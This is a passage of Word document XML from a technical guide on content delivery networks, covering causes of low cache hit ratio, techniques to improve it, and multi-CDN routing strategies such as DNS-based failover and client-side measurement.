    <w:p w14:paraId="085A4C8C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content expires quickly → frequent misses for revalidation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B375401" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Use stale-while-revalidate to maintain high effective hit ratio while keeping content fresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E663B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. High content cardinality (long tail):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4C44B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Millions of unique URLs, each accessed rarely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB4970" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Each edge PoP has limited storage → long-tail content evicted before re-access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D1F82" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Shield layer consolidates demand (10 edges asking shield for rare content → shield keeps it warm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321EA58E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Poor cache key design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1FE91" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Unnecessary query parameters fragmenting cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FF38B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Over-use of Vary headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3EE06F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Normalize cache keys, strip tracking parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634B9FF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Personalized content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD043E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Per-user variants are effectively uncacheable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9CDB6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Separate personalized from shared content (ESI, client-side hydration, edge compute assembly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE57BF5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Geographic distribution with cold edges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D152B9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A PoP with few users for your site has mostly cold cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F72A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Shield absorbs misses from cold edges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD41C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Cache eviction pressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559197CE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>PoP storage is full. Your content is evicted to make room for other customers' content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79A74E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Higher-tier CDN plans offer dedicated capacity or "pinned" content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1443A3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Improving Hit Ratio — Practical Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773980F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Maximize TTL for immutable content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D5B1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BCE49E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, max-age=31536000, immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B31A7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>For versioned assets. Never expires (URL changes for new versions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CCAC9C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Normalize cache keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706A774" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Sort query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552CB41" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Strip tracking parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C6CB6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Collapse equivalent headers (normalize Accept-Encoding to a few canonical values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F32B68" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Enable stale-while-revalidate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4EB7B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content appears "always cached" to users (zero miss latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145A9818" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Refreshes happen in background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728982FE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Reduce Vary dimensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207345E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Instead of Vary: User-Agent (thousands of variants): normalize to device type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014DA409" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Instead of Vary: Cookie (per-user): separate cached/uncached content paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A9D14" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Pre-warm popular content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888B766" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>After deployment: proactively fetch popular URLs at all edges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF08CB2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>After purge: immediately push new content to edges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A527981" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Before expected traffic spikes: populate cache in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C38FB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Use origin shield:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2DD68" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Consolidates misses from multiple edges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424D206" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Higher effective hit ratio at the shield level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399F1BE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="7EB2F8B8">
          <v:rect id="_x0000_i4692" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DBDD64" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Multi-CDN Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9173A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Why Use Multiple CDNs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018CD401" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ADEC3A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Single CDN provider outage doesn't take your site down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C39F3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Real incidents: Fastly outage (2021) took down Reddit, Amazon, Twitch, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857EC31" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>With multi-CDN: traffic shifts to surviving CDN automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CEBE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC1F141" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Different CDNs perform better in different regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D510E46" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN A might be fastest in Asia, CDN B fastest in Europe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D6E17" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Route to the best CDN for each user's location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57956051" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189CD5DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Negotiate better rates by splitting volume across providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4B82D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Use cheaper CDN for bulk traffic, premium CDN for latency-sensitive content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA8817" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Feature availability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3A9DB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN A has better edge compute. CDN B has better video delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB805AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Use each for its strengths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BEDD39" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Multi-CDN Routing Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123994AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-based switching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46095078" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60EF19" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN router (NS1, Constellix, Route53) evaluates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C17451" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - CDN A latency from this user's network: 15ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7397FFFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - CDN B latency from this user's network: 22ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944B8CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Route to CDN A (lower latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7237F6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="54D9A7A4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If CDN A health check fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D011F29" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Route all traffic to CDN B (failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1546E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side measurement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4DF20C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B8004" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>JavaScript on page pings both CDNs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7AE221" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Measures actual performance from this specific client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B421388" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Routes subsequent resources to faster CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F438E0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Can switch mid-session if performance changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436B580" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request-level switching (origin decides):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDDE51" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A6BC24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin returns different CNAME for different requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C8E85" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Static assets: CDN A (best for static)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654424D5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Video: CDN B (best for video)</w:t>
      </w:r>
    </w:p>
